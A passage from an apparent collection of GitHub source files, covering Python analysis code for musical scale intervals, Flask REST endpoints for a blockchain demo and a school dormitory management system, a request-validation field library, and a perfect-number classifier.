ax[2].set_ylabel("Fraction correctly perceived")
df = pd.read_feather(f'Results/three_notes_acc{ACC}.feather')
annot = np.load('Results/annotations.npy')
xticks = np.arange(5, 55, 5)
yticks = np.arange(5, 55, 5)
sns.heatmap(df.pivot('production', 'perception', 'threshold'), ax=ax[3], vmin=30, vmax=300,
annot=annot, fmt="s", xticklabels=xticks, yticklabels=yticks, cbar_kws={'label':r'$I_{\textrm{min}}$'})
ax[3].invert_yaxis()
ax_scale = 5.0
ax[3].set_xticks((np.arange(5, 55, 5)-2.5)/ax_scale)
ax[3].set_yticks((np.arange(5, 55, 5)-2.5)/ax_scale)
ax[3].set_xlabel(r'$\sigma_{per}$')
ax[3].set_ylabel(r'$\sigma_{prod}$')
X = [-0.11, -0.11, -0.27, -0.17]
Y = [1.05, 1.05, 1.02, 1.02]
for i, a in enumerate(ax):
a.text(X[i], Y[i], string.ascii_uppercase[i], transform=a.transAxes, weight='bold', fontsize=16)
plt.savefig(FIGS_DIR + 'transmission_model.pdf', bbox_inches='tight')
if __name__ == "__main__":
# plot_distinguishability_ranges()
# plot_distinguishability_ranges_one_plot()
# plot_distinguishability_two_notes()
# plot_frac_correct()
# plot_heatmap()
plot_SI()
```
#### File: Src/MonteCarlo/post_processing.py
```python
import argparse
import glob
import os
import sys
import time
from itertools import product, permutations
import matplotlib.pyplot as plt
import multiprocessing as mp
import numpy as np
import pandas as pd
import seaborn as sns
import statsmodels.nonparametric.api as smnp
import swifter
from scipy.signal import argrelextrema
N_PROC = 1
CHUNK = 25
MIX = False
BASE_DIR = '/home/jmcbride/Scales/Compared_data'
RAW_DIR = '/home/jmcbride/Scales/Toy_model/Data/Raw/'
PRO_DIR = '/home/jmcbride/Scales/Toy_model/Data/Processed/'
DIST_DIR = '/home/jmcbride/Scales/Toy_model/Data/None_dist/'
REAL_DIR = '/home/jmcbride/Scales/Real_scales'
TEMP_MIN = 50.
TEMP_MAX = 300.
TEMP_LOW_MARGIN = 0.50
TEMP_HI_MARGIN = 1.50
N_TRIALS = 50
ALPHA_W = 0.1
def parse_arguments():
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--partabase', action='store', default='None', type=str)
parser.add_argument('-f', action='store', default='None', dest='fName', type=str)
parser.add_argument('--sample', action='store_true', default=False, dest='sample',)
return parser.parse_args()
args = parse_arguments()
def get_scale_from_pair_ints(pair_ints):
ints = [int(y) for y in pair_ints.split(';')]
return ';'.join(['0'] + [str(y) for y in np.cumsum(ints)])
def calculate_most_harmonic_neighbour(int_cents, sim_only=False, CENT_DIFF_MAX=22):
best_ratio = [1,1]
max_similarity = 0.0
cents = 0.0
for x in np.arange(1,75, dtype=float):
cent_diff = 1200.*np.log10((x+1.)/x)/np.log10(2.) - int_cents
if cent_diff > CENT_DIFF_MAX:
continue
for y in np.arange(x+1.,99., dtype=float):
cent_diff = abs(1200.*np.log10(y/x)/np.log10(2.)- int_cents)
if cent_diff > CENT_DIFF_MAX:
continue
simil = ((x+y-1.)/(x*y))*100.
if simil > max_similarity:
cents = 1200.*np.log10(y/x)/np.log10(2.)
best_ratio = [y,x]
max_similarity = simil
if sim_only:
return max_similarity
else:
return max_similarity, best_ratio, cents
def get_attractors(n, dI=5., diff=22):
sc_i = np.arange(dI, 1200.+dI, dI)
sc_f = set()
attract = []
ratios = []
simils = []
for s in sc_i:
max_similarity, best_ratio, cents = calculate_most_harmonic_neighbour(s, CENT_DIFF_MAX=diff)
if max_similarity == 0.0:
continue
if round(cents,2) not in sc_f:
sc_f.add(round(cents,2))
attract.append(round(cents,2))
ratios.append(best_ratio)
simils.append(max_similarity**n / 100.**(n-1))
return sc_i, np.array(attract), ratios, simils
def get_similarity_of_nearest_attractor(x, sc_f, simil):
minIdx = np.argmin(np.abs(sc_f - x))
return simil[minIdx]
def get_harmonic_similarity_score_series(series, diff, n):
sc_i, sc_f, ratios, simil = get_attractors(n, diff=diff)
return series.swifter.apply(lambda x: np.mean([get_similarity_of_nearest_attractor(float(y), sc_f, simil) for y in x.split(';')]))
def calculate_optimum_window_size(df):
def fn(x):
w_arr = np.arange(15,61)
d_arr = []
n_arr = []
for w in w_arr:
dists = calculate_distance_between_windows(x, w)
d_arr.append(min([int(y) for y in dists.split(';')]) if len(dists) else 0)
n_arr.append(len(dists.split(';'))+1 if len(dists) else 1)
d_arr = np.array(d_arr)
cost = np.zeros(len(w_arr), dtype=float)
idx = np.where(d_arr)[0]
cost[idx] = w_arr[idx] / d_arr[idx]
# idx = [i for i in range(cost.size) if 0< d_arr[i] < 20]
# if len(idx):
# cost[idx] = cost[idx] + 10.
idxMin = np.argmin(cost)
return ';'.join([str(y) for y in [round(cost[idxMin],3)+ALPHA_W, w_arr[idxMin], d_arr[idxMin], n_arr[idxMin]]])
df['tmp'] = df.pair_ints.swifter.apply(fn)
df['opt_c'] = df.tmp.swifter.apply(lambda x: float(x.split(';')[0]))
df['opt_w'] = df.tmp.swifter.apply(lambda x: int(x.split(';')[1]))
df['opt_d'] = df.tmp.swifter.apply(lambda x: int(x.split(';')[2]))
df['opt_n'] = df.tmp.swifter.apply(lambda x: int(x.split(';')[3]))
return df.drop(columns=['tmp'])
def calculate_highest_minimum(df):
cols = [c for c in df.columns if len(c.split('_')) == 3 and c[-3:] == 'min']
df['best_sep'] = df.swifter.apply(lambda x: max([x[c] for c in cols]))
return df
def calculate_distance_between_windows(x, w):
ints = sorted([int(y) for y in x.split(';')])
windows = [[ints[0]]]
for i in ints[1:]:
if i - windows[-1][0] < w:
windows[-1].append(i)
else:
windows.append([i])
if len(windows) == 1:
return ''
else:
dist = [windows[i+1][0] - windows[i][-1] for i in range(len(windows)-1)]
return ';'.join([str(d) for d in dist]) if len(dist) > 1 else str(dist[0])
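# Example with w = 40: intervals '100;110;200' group into windows
# [[100, 110], [200]], so the returned gap string is '90' (200 - 110).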
def get_distance_between_windows(df, w, X='pair_ints'):
df[f"d_w{w}"] = df.loc[:,X].swifter.apply(lambda x: calculate_distance_between_windows(x, w))
df[f"d_w{w}_min"] = df.loc[:,f"d_w{w}"].swifter.apply(lambda x: min([int(y) for y in x.split(';')]) if len(x) else 0)
df[f"d_w{w}_mean"] = df.loc[:,f"d_w{w}"].swifter.apply(lambda x: np.mean([int(y) for y in x.split(';')]) if len(x) else 0)
return df
def calc_relative_entropy(pk, qk):
RE = 0.0
for i in range(len(pk)):
if pk[i] <= 0 or qk[i] <= 0:
pass
else:
RE += pk[i] * np.log2(pk[i] / qk[i])
return RE
def calc_jensen_shannon_distance(pk, qk):
mk = 0.5 * (pk + qk)
return (0.5 * (calc_relative_entropy(pk, mk) + calc_relative_entropy(qk, mk))) ** 0.5
def convert_grid(grid, y, num=1201):
new_grid = np.linspace(0, 1200, num=num)
new_y = np.zeros(num, dtype=float)
if grid[0] < 0:
start_point = 0
else:
start_point = np.where(new_grid - grid[0] > 0)[0][0]
if grid[-1] > 1200:
end_point = num
else:
end_point = np.where(new_grid - grid[-1] > 0)[0][0]
for i in range(start_point, end_point):
idx = np.where(grid - new_grid[i] > 0)[0][0]
new_y[i] = y[idx-1] + (new_grid[i] - grid[idx-1]) * (y[idx] - y[idx-1]) / (grid[idx] - grid[idx-1])
return new_grid, new_y
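# Resample a KDE (support `grid`, density `y`) onto a fixed 0-1200 cent grid
# by linear interpolation, so distributions can be compared bin-by-bin.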
def smooth_dist_kde(df, cat='pair_ints', hist=False):
X = [float(x) for y in df.loc[:,cat] for x in y.split(';')]
kde = smnp.KDEUnivariate(np.array(X))
kde.fit(kernel='gau', bw='scott', fft=1, gridsize=10000, cut=20)
grid, y = kde.support, kde.density
if hist:
        hist, edges = np.histogram(X, bins=grid, density=True)
xxx = grid[:-1] + (grid[1] - grid[0]) * 0.5
return grid, y, xxx, hist
else:
return grid, y
def get_KDE(df, cat):
xKDE, yKDE = smooth_dist_kde(df, cat=cat)
xKDE, yKDE = convert_grid(xKDE, yKDE)
return yKDE / np.trapz(yKDE)
def get_real_scales_dists(n, df_real):
fHist = os.path.join(REAL_DIR, f"n_{n}_hist.npy")
fKDE = os.path.join(REAL_DIR, f"n_{n}_kde.npy")
if os.path.exists(fHist):
data = np.load(fHist)
xHist, yHist = data[:,0], data[:,1]
data = np.load(fKDE)
new_grid, new_y = data[:,0], data[:,1]
else:
xKDE, yKDE, xHist, yHist = smooth_dist_kde(df_real.loc[df_real.n_notes==n], cat='pair_ints', hist=True)
new_grid, new_y = convert_grid(xKDE, yKDE)
np.save(fHist, np.array([xHist, yHist]).T)
np.save(fKDE, np.array([new_grid, new_y]).T)
return new_grid, new_y, xHist, yHist
def calculate_energy_from_intervals(ints, base, m, n):
return np.mean([abs(round(i/base) - i/base)**m * float(round(i/base))**n for i in ints])
def template_function(ints, m, n):
ints = [float(x) for x in ints.split(';')]
temp_min = max(TEMP_MIN, min(ints)*TEMP_LOW_MARGIN)
temp_max = min(TEMP_MAX, min(ints)*TEMP_HI_MARGIN)
baseArr = np.linspace(temp_min, temp_max, num=N_TRIALS)
energies = np.zeros(baseArr.size, dtype=float)
for i, base in enumerate(baseArr):
energies[i] = calculate_energy_from_intervals(ints, base, m, n)
if len(np.where(energies==0)[0]) > 1:
idxMin = np.where(energies==0)[0][-1]
else:
idxMin = np.argmin(energies)
return energies[idxMin]
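# Grid-search the template step size `base` within [TEMP_MIN, TEMP_MAX],
# further bounded by 0.5-1.5 times the smallest interval, and return the
# lowest deviation-from-integer-multiples energy.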
def test_distinguishability_integer_multiples(df):
for n in range(3):
for m in range(3):
if N_PROC > 1:
pool = mp.Pool(N_PROC)
df[f"distI_{m}_{n}"] = pool.starmap(template_function, product(df.pair_ints, [m], [n]))
pool.close()
else:
df[f"distI_{m}_{n}"] = df.pair_ints.swifter.apply(lambda x: template_function(x, m, n))
return df
def test_distinguishability_window_distance(df):
return calculate_optimum_window_size(df)
def test_harmonic_series_similarity(df, n):
for i in range(5,25,5):
df[f"hs_n{n}_w{i:02d}"] = get_harmonic_similarity_score_series(df.all_ints2, i, n)
return df
def str_to_ints(st, delim=';'):
return [int(s) for s in st.split(delim) if len(s)]
def ints_to_str(i):
return ';'.join([str(x) for x in i])
def get_all_ints(df, old='pair_ints', new='all_ints2'):
def fn(pi):
ints = np.array(str_to_ints(pi))
return ints_to_str([x for i in range(len(ints)) for x in np.cumsum(np.roll(ints,i))[:-1]])
df[new] = df[old].apply(fn)
return df
def calculate_fifths_bias(df):
for w in [5,10,15,20]:
df[f"Nim5_r0.0_w{w}"] = [float(len([z for z in y.split(';') if abs(702-int(z)) <= w]) / len(y.split(';'))) for y in df.all_ints2]
return df
def process_df(df, grid):
timeS = time.time()
if grid and MIX:
# df['scale'] = df.scale.swifter.apply(lambda x: '0;' + x)
if N_PROC > 1:
pool = mp.Pool(N_PROC)
df['mix_ints'] = pool.map(choose_permutation, df.pair_ints, CHUNK)
df['mix_scale'] = pool.map(get_scale_from_pair_ints, df.mix_ints, CHUNK)
pool.close()
else:
df['mix_ints'] = df.pair_ints.swifter.apply(choose_permutation)
df['mix_scale'] = df.mix_ints.swifter.apply(get_scale_from_pair_ints)
# print(f"Mixing: {(time.time()-timeS)/60.} minutes")
df['min_int'] = df.pair_ints.apply(lambda x: min([int(y) for y in x.split(';')]))
df = df.drop(index=df.loc[df.min_int==0].index).reset_index(drop=True)
df['max_int'] = df.pair_ints.apply(lambda x: max([int(y) for y in x.split(';')]))
print(f"Min/max: {(time.time()-timeS)/60.} minutes")
df = get_all_ints(df)
print(f"All_ints2: {(time.time()-timeS)/60.} minutes")
df = test_distinguishability_integer_multiples(df)
print(f"DistI: {(time.time()-timeS)/60.} minutes")
df = calculate_fifths_bias(df)
print(f"Fifths score: {(time.time()-timeS)/60.} minutes")
# df = test_distinguishability_window_distance(df)
# print(f"DistW: {(time.time()-timeS)/60.} minutes")
# df['opt_c_I1'] = df.opt_c * df.distI_0_1
# df['opt_c_I2'] = df.opt_c * df.distI_0_2
# print(f"DistW_S1: {(time.time()-timeS)/60.} minutes")
# def small_int_bias(x, n):
# ints = np.array([int(y) for y in x.split(';')])
# return np.sum(ints**n) / 1200.**n
# df['opt_c_s2'] = df.opt_c * df.pair_ints.swifter.apply(lambda x: small_int_bias(x, 2))
# df['opt_c_s3'] = df.opt_c * df.pair_ints.swifter.apply(lambda x: small_int_bias(x, 3))
# print(f"DistW_S2: {(time.time()-timeS)/60.} minutes")
df = test_harmonic_series_similarity(df, 1)
df = test_harmonic_series_similarity(df, 2)
df = test_harmonic_series_similarity(df, 3)
print(f"HS: {(time.time()-timeS)/60.} minutes")
return df
def ss_fn(x, df_real, idx, w):
return ';'.join([str(i) for i in idx if is_scale_similar(x, df_real.loc[i, 'scale'], w)])
def process_grid_similar_scales(df_grid, df_real, n):
timeS = time.time()
if args.sample:
samples = ['theory', 'instrument'] + [f"sample_f{frac:3.1f}_{i:02d}" for frac in [0.4, 0.6, 0.8] for i in range(10)]
for w in [10, 20]:
for i, s in enumerate(samples):
idx = df_real[i].loc[df_real[i].n_notes==n].index
if N_PROC > 1:
pool = mp.Pool(N_PROC)
df_grid[f'{s}_ss_w{w:02d}'] = pool.starmap(ss_fn, product(df_grid.scale, [df_real[i]], [idx], [w]))
pool.close()
else:
df_grid[f'{s}_ss_w{w:02d}'] = df_grid.scale.apply(lambda x: ss_fn(x, df_real[i], idx, w))
print(f"ss_w{w:02d}: {(time.time()-timeS)/60.} minutes")
else:
idx = df_real.loc[df_real.n_notes==n].index
for w in [10, 20]:
if N_PROC > 1:
pool = mp.Pool(N_PROC)
df_grid[f'ss_w{w:02d}'] = pool.starmap(ss_fn, product(df_grid.scale, [df_real], [idx], [w]))
if MIX:
df_grid[f'mss_w{w:02d}'] = pool.starmap(ss_fn, product(df_grid.mix_scale, [df_real], [idx], [w]))
pool.close()
else:
df_grid[f'ss_w{w:02d}'] = df_grid.scale.swifter.apply(lambda x: ss_fn(x, df_real, idx, w))
if MIX:
df_grid[f'mss_w{w:02d}'] = df_grid.mix_scale.swifter.apply(lambda x: ss_fn(x, df_real, idx, w))
print(f"ss_w{w:02d}: {(time.time()-timeS)/60.} minutes")
return df_grid
def is_scale_similar(x, y, w):
xint = [int(a) for a in x.split(';')]
yint = [int(a) for a in y.split(';')]
return np.allclose(xint, yint, atol=w)
def how_much_real_scales_predicted(df, n_real, w):
return float(len(set([int(x) for y in df[f"ss_w{w:02d}"] for x in y.split(';') if len(y)]))) / float(n_real)
def mixing_cost_arr(arr):
    # RMS deviation of each cyclically adjacent pair of intervals from twice
    # the mean step size (2400/N cents for an N-interval octave)
    return np.array([np.mean([np.abs(ints[i - 1] + ints[i % len(ints)] - 2400. / float(len(ints)))**2
                              for i in range(1, len(ints) + 1)])**0.5
                     for ints in arr])
def get_probability_from_costs(costs):
return np.array([np.exp(1./c) / np.sum(np.exp(1./costs)) for c in costs])
def permute_scale(int_str):
ints = np.array([int(x) for x in int_str.split(';')])
return np.array(list(set(permutations(ints))))
def choose_permutation(int_str):
perm = permute_scale(int_str)
costs = mixing_cost_arr(perm)
np.random.seed()
if np.any(costs==0):
return ';'.join([str(int(round(x))) for x in perm[np.random.randint(len(perm))]])
else:
prob = get_probability_from_costs(costs/costs.max())
ran = np.random.rand()
cumprob = np.cumsum(prob)
return ';'.join([str(int(round(x))) for x in perm[np.where(cumprob>ran)[0][0]]])
def get_metrics(grid, y1, y2):
y1 = y1.reshape(y1.size)
y2 = y2.reshape(y2.size)
geo_norm = np.sqrt(np.dot(y1, y2))
err_sq = np.sqrt(np.dot(y1-y2, y1-y2))
balpeak_geo_norm = np.sqrt(np.dot(y1, y2/y2.max()*y1.max()))
balpeak_err_sq = np.sqrt(np.dot(y1-y2/y2.max()*y1.max(), y1-y2/y2.max()*y1.max()))
cum_geo_norm = np.sqrt(np.dot(np.cumsum(y1), np.cumsum(y2)))
cum_err_sq = np.sqrt(np.dot(np.cumsum(y1) - np.cumsum(y2), np.cumsum(y1) - np.cumsum(y2)))
peak1 = argrelextrema(y1, np.greater)[0]
peak2 = argrelextrema(y2, np.greater)[0]
peak_ratio = float(len(peak1)) / float(len(peak2))
peak_dist = 0.0
for p1 in peak1:
peak_dist += np.min(np.abs(peak2-p1))
d1 = y1[1:] - y1[:-1]
d2 = y2[1:] - y2[:-1]
deriv_gn = np.sqrt(np.dot(d1, d2))
deriv_es = np.sqrt(np.dot(d1-d2, d1-d2))
output = [geo_norm, err_sq, balpeak_geo_norm, balpeak_err_sq, cum_geo_norm,
cum_err_sq, peak_ratio, peak_dist, deriv_gn, deriv_es]
return output
if __name__ == "__main__":
categories = ['pair_ints']
n = int(args.fName.split('_')[0].strip('n'))
n_arr = np.array([n])
if args.sample:
df_real = [pd.read_feather(os.path.join(REAL_DIR, 'Samples', f"{f}.feather")) for f in ['theory', 'instrument'] + \
[f"sample_f{frac:3.1f}_{i:02d}" for frac in [0.4, 0.6, 0.8] for i in range(10)]]
else:
if os.path.exists(os.path.join(REAL_DIR, 'theories_real_scales.feather')):
df_real = pd.read_feather(os.path.join(REAL_DIR, 'theories_real_scales.feather'))
else:
df_real = pd.read_feather(os.path.join(REAL_DIR, 'real_scales.feather'))
df_real = process_df(df_real, 0)
df_real.to_feather(os.path.join(REAL_DIR, 'theories_real_scales.feather'))
def read_model_results(path):
print(path)
fName = os.path.split(path)[1]
if args.sample:
pro_name = os.path.join(PRO_DIR, 'sample_'+fName)
else:
pro_name = os.path.join(PRO_DIR, fName)
tmp_df = pd.read_feather(path)
tmp_df['beta'] = float(fName.split('_')[-1].strip('.feather'))
tmp_df = process_df(tmp_df, 1)
n = int(fName.split('_')[0].strip('n'))
tmp_df = process_grid_similar_scales(tmp_df, df_real, n)
tmp_df.to_feather(pro_name)
return tmp_df
df_grid = read_model_results(os.path.join(RAW_DIR, args.fName))
# df_grid = read_model_results(os.path.join(PRO_DIR, args.fName))
``` |
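The helpers above all operate on `;`-delimited interval strings. A minimal usage sketch with toy data (the interval values and the direct calls are illustrative assumptions, not taken from the original pipeline):

```python
# Toy 7-note scale; intervals in cents, summing to one octave (1200).
pair_ints = "200;200;100;200;200;200;100"
ints = str_to_ints(pair_ints)            # -> [200, 200, 100, 200, 200, 200, 100]
mixed = choose_permutation(pair_ints)    # stochastic permutation biased towards
                                         # evenly mixed arrangements
energy = calculate_energy_from_intervals(ints, base=100, m=2, n=1)
print(mixed, energy)                     # energy == 0.0 here: every interval is
                                         # an exact multiple of the 100-cent base
```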
{
"source": "JoMingyu/Blockchain-py",
"score": 2
} |
#### File: app/views/__init__.py
```python
from flask_restful import Api
class ViewInjector:
def __init__(self, app=None):
if app is not None:
self.init_app(app)
def init_app(self, app):
from app.views.blockchain import Node, Chain, Mine, Transaction
api = Api(app)
api.add_resource(Node, '/node')
api.add_resource(Chain, '/chain')
api.add_resource(Mine, '/mine')
api.add_resource(Transaction, '/transaction')
``` |
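A sketch of how the injector above is wired into an application (the import path matches the file header; everything else is assumed):

```python
from flask import Flask
from app.views import ViewInjector

app = Flask(__name__)
ViewInjector(app)   # registers /node, /chain, /mine and /transaction via flask_restful
```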
{
"source": "JoMingyu/DMS-Migrates-to-Python",
"score": 2
} |
#### File: admin/post/faq.py
```python
from flask import request, session, abort
from flask_restful import Resource
from support.user.user_manager import get_admin_id_from_request
from database.mongodb import faq
from pymongo.collection import ObjectId
class FAQ(Resource):
"""
FAQ(POST, DELETE, GET, PATCH available)
"""
def post(self):
if not get_admin_id_from_request(request, session):
abort(403)
title = request.form.get('title')
content = request.form.get('content')
faq.insert({
'title': title,
'content': content
})
return '', 201
def delete(self):
if not get_admin_id_from_request(request, session):
abort(403)
_id = request.form.get('_id')
faq.remove({
'_id': ObjectId(_id)
})
return '', 200
def get(self):
# list
data = list(faq.find())
for idx in range(len(data)):
data[idx]['_id'] = str(data[idx]['_id'])
return data, 200
def patch(self):
if not get_admin_id_from_request(request, session):
abort(403)
_id = request.form.get('_id')
title = request.form.get('title')
content = request.form.get('content')
faq.update({'_id': ObjectId(_id)}, {
'title': title,
'content': content
})
return '', 200
```
#### File: developer/initializer/account.py
```python
from flask import request
from flask_restful import Resource
import uuid as _uuid
from support.crypto import *
from database.mongodb import student_acc
class NewUUID(Resource):
"""
    Create a new UUID (POST available)
"""
def post(self):
number = request.form.get('number', type=int)
name = request.form.get('name')
uuid = str(_uuid.uuid4())
student_acc.insert({
'id': None,
'pw': None,
'sid': None,
'uuid': sha.encrypt(uuid),
'number': aes.encrypt(number),
'name': aes.encrypt(name)
})
return uuid, 201
class Migration(Resource):
"""
    Handles the student-number migration each year when new students enroll.
    1. Delete 3rd-year students from the database
    2. Load the 1st- and 2nd-year students' data from the legacy uuid Excel file (tuples in a list)
    3. Load the 2nd- and 3rd-year students' data from the new student-data Excel file (tuples in a list)
    4. Look up the new student number whose name matches
    5. Replace the legacy student number with the new one, keyed on the uuid
    * Resolving the duplicate-name problem
    Because (1) we are replacing student numbers and (2) we match on names,
    the problem can be solved by temporarily rewriting the names.
    e.g. when 10101 Kim Jisu and 10102 Kim Jisu move up to 20101 Kim Jisu and 20201 Kim Jisu,
    assume 10101 Kim Jisu and 20101 Kim Jisu are the same person and temporarily rename both to 'Kim Jisu1',
    and since 10102 Kim Jisu and 20201 Kim Jisu are the same person, temporarily rename both to 'Kim Jisu2';
    the code can then resolve the duplicate-name problem.
"""
_legacy_uuid_excel = 'legacy_uuid'
def post(self):
def remove_3rd():
data = list(student_acc.find())
for d in data:
if aes.decrypt(d['number']) > 30000:
student_acc.remove({'number': d['number']})
def read_legacy_data():
data = list()
# Some logic..
return data
def read_new_data():
data = list()
# some logic..
return data
def change_student_data(uuid, number_for_change):
data = dict(student_acc.find_one({'uuid': sha.encrypt(uuid)}))
data.update({
'number': aes.encrypt(number_for_change)
})
student_acc.update({'uuid': sha.encrypt(uuid)}, data)
remove_3rd()
legacy_data = read_legacy_data()
new_data = read_new_data()
for legacy_idx, legacy in enumerate(legacy_data):
legacy_number, legacy_name, uuid = legacy
            assert isinstance(legacy_number, int)
            for new_idx, new in enumerate(new_data):
                new_number, new_name = new
                assert isinstance(new_number, int)
                if legacy_name == new_name and legacy_number // 10000 + 1 == new_number // 10000:
change_student_data(uuid, new_number)
del legacy_data[legacy_idx]
del new_data[new_idx]
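                    # NOTE: deleting from these lists while enumerating them skips
                    # the element right after each match; iterating over copies is safer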
return '', 201
```
#### File: student/account/account.py
```python
from flask import request, session, Response
from flask_restful import Resource
import uuid as _uuid
from support.user.user_manager import get_uuid_from_request
from support.crypto import *
from database.mongodb import student_acc
# A student account consists of: uuid, student number, name, id, password, sid
class Signup(Resource):
"""
    uuid-based student signup (POST available)
"""
def post(self):
uuid = sha.encrypt(request.form.get('uuid'))
_id = aes.encrypt(request.form.get('id'))
pw = sha.encrypt(request.form.get('pw'))
if not student_acc.find_one({'uuid': uuid}):
            # 1. the uuid does not exist
return '', 204
elif student_acc.find_one({'uuid': uuid})['id'] is not None:
            # 2. this uuid has already completed signup
return '', 204
elif student_acc.find_one({'id': _id}):
            # 3. this id is already registered ('c' signals the duplicate)
            return 'c', 204
data = student_acc.find_one({'uuid': uuid})
data.update({
'id': _id,
'pw': pw
})
student_acc.update({'uuid': uuid}, data)
return '', 201
class SignIn(Resource):
"""
    Student sign-in (POST available)
"""
def post(self):
_id = aes.encrypt(request.form.get('id'))
pw = sha.encrypt(request.form.get('pw'))
keep_login = request.form.get('keep_login', False, bool)
if student_acc.find_one({'id': _id, 'pw': pw}):
            # login succeeded
resp = Response('', 201)
sid = str(_uuid.uuid4())
if keep_login:
                # keep the login - via cookie
resp.set_cookie('UserSession', sid)
else:
                # don't keep the login - via server-side session
session['UserSession'] = sid
data = student_acc.find_one({'id': _id})
data.update({
'sid': sid
})
student_acc.update({'id': _id}, data)
            # update the SID
return resp
else:
return '', 204
class Logout(Resource):
"""
    Logout (POST available)
"""
def post(self):
uuid = get_uuid_from_request(request, session)
if uuid:
data = student_acc.find_one({'uuid': uuid})
data.update({
'sid': None
})
student_acc.update({'uuid': uuid}, data)
resp = Response('', 201)
if 'UserSession' in request.cookies:
resp.set_cookie('UserSession', '', expires=0)
elif 'UserSession' in session:
session.pop('UserSession')
return resp
else:
return '', 204
```
#### File: student/apply/extension.py
```python
from flask import request, session
from flask_restful import Resource
from support.user.user_manager import get_uuid_from_request
from database.mongodb import extension
class Extension(Resource):
"""
    Extension application (POST, GET, DELETE available)
"""
def post(self):
uuid = get_uuid_from_request(request, session)
if not uuid:
return '', 204
_class = request.form.get('class')
value = request.form.get('value', 1, int)
extension.remove({'uuid': uuid})
extension.insert({
'uuid': uuid,
'class': _class,
'value': value
})
return '', 201
def get(self):
uuid = get_uuid_from_request(request, session)
if not uuid:
return '', 204
return extension.find_one({'uuid': uuid}, {'_id': False}), 200
def delete(self):
uuid = get_uuid_from_request(request, session)
if not uuid:
return '', 204
extension.remove({'uuid': uuid})
return '', 200
```
#### File: support/user/user_manager.py
```python
from database.mongodb import student_acc, admin_acc
def get_uuid_from_request(request, session):
sid = ''
if 'UserSession' in session:
sid = session['UserSession']
elif 'UserSession' in request.cookies:
sid = request.cookies['UserSession']
data = student_acc.find_one({'sid': sid})
return data['uuid'] if data else None
def get_admin_id_from_request(request, session):
sid = ''
if 'AdminSession' in session:
sid = session['AdminSession']
elif 'AdminSession' in request.cookies:
sid = request.cookies['AdminSession']
data = admin_acc.find_one({'sid': sid})
return data['id'] if data else None
``` |
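These two lookup helpers back every authenticated endpoint in the project. A minimal sketch of the calling pattern (the resource itself is hypothetical):

```python
from flask import request, session
from flask_restful import Resource
from support.user.user_manager import get_uuid_from_request

class WhoAmI(Resource):
    def get(self):
        uuid = get_uuid_from_request(request, session)
        if not uuid:
            return '', 204  # no valid session id in either cookie or session
        return {'uuid': uuid}, 200
```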
{
"source": "JoMingyu/Flask-Large-Application-Example-Simplified",
"score": 3
} |
#### File: app/views/__init__.py
```python
from functools import wraps
from flask import abort, request
def json_required(*required_keys):
def decorator(fn):
if fn.__name__ == 'get':
print('[WARN] JSON with GET method? on "{}()"'.format(fn.__qualname__))
@wraps(fn)
def wrapper(*args, **kwargs):
if not request.is_json:
abort(406)
for required_key in required_keys:
if required_key not in request.json:
abort(400)
return fn(*args, **kwargs)
return wrapper
return decorator
class Router(object):
"""
REST resource routing helper class like standard flask 3-rd party libraries
"""
def __init__(self, app=None):
if app is not None:
self.init_app(app)
def init_app(self, app):
"""
Routes resources. Use app.register_blueprint() aggressively
"""
from app.views import sample
app.register_blueprint(sample.api.blueprint)
```
#### File: app/views/sample.py
```python
from flask import Blueprint, request
from flask_restful import Api, Resource
from app.views import json_required
api = Api(Blueprint('sample_api', __name__))
api.prefix = '/prefix'
@api.resource('/sample')
class Sample(Resource):
@json_required('name', 'age')
def post(self):
return request.json
``` |
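A hypothetical client call against the `Sample` resource above (host and port are assumptions):

```python
import requests

r = requests.post('http://localhost:5000/prefix/sample',
                  json={'name': 'jom', 'age': 20})
print(r.status_code, r.json())  # 200 and the echoed JSON; a missing key -> 400,
                                # a non-JSON body -> 406
```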
{
"source": "JoMingyu/Flask-Validation",
"score": 3
} |
#### File: Flask-Validation/flask_validation/fields.py
```python
import re
class _BaseField:
"""
Base field class
"""
def __init__(self, validator_function=None, enum=None, required: bool=True, allow_null: bool=False):
self.required = required
self.enum = enum
self.allow_null = allow_null
self.validator_function = validator_function
    def validate(self, value):
        if self.enum is not None and value not in self.enum:
            return False
        # allow_null is checked in decorators.py
        if self.validator_function is not None and not self.validator_function(value):
            return False
        return True
class StringField(_BaseField):
"""
String field class
"""
def __init__(self, allow_empty: bool=True, min_length: int=None, max_length: int=None, regex=None, **kwargs):
self.allow_empty = allow_empty
self.min_length = min_length
self.max_length = max_length
self.regex = re.compile(regex) if regex else None
super(StringField, self).__init__(**kwargs)
def validate(self, value):
if not isinstance(value, str):
return False
if self.max_length is not None and len(value) > self.max_length:
return False
if self.min_length is not None and len(value) < self.min_length:
return False
if self.regex is not None and self.regex.match(value) is None:
return False
return super(StringField, self).validate(value)
class NumberField(_BaseField):
"""
Number field class
"""
def __init__(self, min_value=None, max_value=None, **kwargs):
self.min_value = min_value
self.max_value = max_value
super(NumberField, self).__init__(**kwargs)
def validate(self, value):
if self.min_value is not None and value < self.min_value:
return False
if self.max_value is not None and value > self.max_value:
return False
return super(NumberField, self).validate(value)
class IntField(NumberField):
"""
Int field class
"""
def validate(self, value):
if not isinstance(value, int):
return False
return super(IntField, self).validate(value)
class FloatField(NumberField):
"""
Float field class
"""
def validate(self, value):
if not isinstance(value, float):
return False
return super(FloatField, self).validate(value)
class BooleanField(_BaseField):
"""
Boolean field class
"""
def validate(self, value):
if not isinstance(value, bool):
return False
return super(BooleanField, self).validate(value)
class ListField(_BaseField):
"""
List field class
"""
def __init__(self, min_length: int=None, max_length: int=None, **kwargs):
self.min_length = min_length
self.max_length = max_length
super(ListField, self).__init__(**kwargs)
def validate(self, value):
if not isinstance(value, list):
return False
if self.max_length is not None and len(value) > self.max_length:
return False
if self.min_length is not None and len(value) < self.min_length:
return False
return super(ListField, self).validate(value)
``` |
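A quick check of the field classes above with illustrative values (this relies on `_BaseField.validate` returning `True` on success, as fixed above):

```python
name = StringField(min_length=2, max_length=10, regex=r'^[a-z]+$')
print(name.validate('jom'))   # True
print(name.validate('J'))     # False: too short and fails the regex
age = IntField(min_value=0, max_value=150)
print(age.validate(20))       # True
print(age.validate(-1))       # False: below min_value
```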
{
"source": "JoMingyu/Functional-Thinking",
"score": 4
} |
#### File: JoMingyu/Functional-Thinking/04. Natural Number Classifier.py
```python
def get_aliquot_sum(n):
return sum([i for i in range(1, n) if n % i == 0])
# 완전수
def is_perfect(n):
return get_aliquot_sum(n) == n
# 과잉수
def is_abundant(n):
return get_aliquot_sum(n) > n
# 부족수
def is_deficient(n):
return get_aliquot_sum(n) < n
``` |
